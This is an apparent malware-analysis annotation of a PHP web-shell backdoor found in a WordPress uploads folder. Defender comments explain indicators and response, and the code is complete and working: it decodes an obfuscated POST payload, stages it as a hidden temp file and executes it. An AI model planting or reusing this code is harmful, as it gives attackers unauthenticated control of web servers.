File: /var/www/thaler/wp-content/uploads/wpcode/metaweblogapi.php
<?php
// ANALYST NOTES (comments only; the sample's code is left byte-identical so
// hashes of the code lines and string-based signatures still match).
//
// Purpose: POST-triggered remote code execution stub. It decodes a payload
// from one request parameter, writes it to a hidden temp file, include()s it
// as PHP, then deletes the file. No authentication or secret check is visible
// in this listing; possession of the encoding scheme is the only gate.
//
// Triage pointers for defenders:
//   - The file sits under wp-content/uploads/ (see the path header above);
//     PHP execution in upload directories should be disabled at the web server.
//   - Request-side indicator: POST to this script with a parameter named
//     "flag" whose value is a long dot-separated list of integers.
//   - Host-side indicator: short-lived file named ".k" in a temp directory,
//     created by the web-server user.
//   - The decoded payload exists on disk only briefly, so web/WAF request
//     logs and process telemetry are the main evidence sources.

// "\x66la\x67" is the hex-escaped spelling of "flag"; the escapes keep the
// literal parameter name out of naive string searches.
if(array_key_exists("\x66la\x67", $_POST)){
// Candidate staging directories, tried in this order. array_filter() drops
// falsy entries (e.g. getenv() returning false, empty ini values).
$binding = array_filter([sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", "/tmp"]);
// Attacker-controlled input: taken straight from the request body.
$value = $_POST["\x66la\x67"];
// The payload arrives as "."-separated tokens, one token per output byte.
$value= explode ( "." , $value );
// Accumulator for the decoded payload.
$reference ='';
// 36-character key (a-z, 0-9) used cyclically by the decoder below.
$salt7 ='abcdefghijklmnopqrstuvwxyz0123456789';
$sLen =strlen($salt7 );
// Decoder: for token at index $s, subtract the key character's ordinal and
// ($s % 10), then XOR with 96, and append the resulting byte. This is
// obfuscation, not encryption: key and constants are embedded in the file.
foreach($value as $s => $v8) {
$chS =ord($salt7[$s% $sLen] );
$dec =((int)$v8 - $chS -($s% 10)) ^ 96;
$reference .= chr($dec ); }
// Stage-and-execute loop: stops at the first directory where it succeeds.
foreach ($binding as $key => $item) {
if (is_writable($item) && is_dir($item)) {
// Staging path is "<dir>/.k" (dot-prefixed, so hidden from a plain `ls`).
$desc = vsprintf("%s/%s", [$item, ".k"]);
// Writes the decoded bytes; the return value is the byte count, so an
// empty payload (0 bytes) is treated as failure and the next dir is tried.
$success = file_put_contents($desc, $reference);
if ($success) {
// Executes the decoded, request-supplied content as PHP in this process.
include $desc;
// Cleanup of the staged file; "@" suppresses any unlink warning.
// NOTE(review): if the included code ends the script itself (exit/fatal
// error), this line is never reached and ".k" stays on disk - worth
// checking the temp directories listed above during response.
@unlink($desc);
// Ends the request after the first successful execution.
die();}
}
}
}